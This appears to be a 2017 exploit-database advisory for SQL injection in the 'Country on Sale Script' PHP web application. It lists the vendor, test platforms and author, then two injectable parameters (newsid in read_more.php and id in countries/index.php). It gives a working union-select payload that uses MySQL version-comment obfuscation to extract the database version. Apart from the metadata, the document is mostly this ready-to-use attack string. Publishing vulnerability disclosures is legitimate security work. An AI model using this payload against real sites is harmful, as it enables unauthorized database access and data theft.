20 lines
No EOL
744 B
Text
20 lines
No EOL
744 B
Text
# # # # #
|
|
# Exploit Title: Country on Sale Script - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 09.03.2017
|
|
# Vendor Homepage: http://www.websitescripts.org/
|
|
# Software: http://www.websitescripts.org/website-scripts/country-on-sale-script/prod_53.html
|
|
# Demo: http://www.websitescripts.org/demo/countryonsalescript/
|
|
# Version: N/A
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/read_more.php?newsid=[SQL]
|
|
# http://localhost/[PATH]/countries/index.php?id=[SQL]
|
|
# 13'+/*!50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+-
|
|
# Etc..
|
|
# # # # # |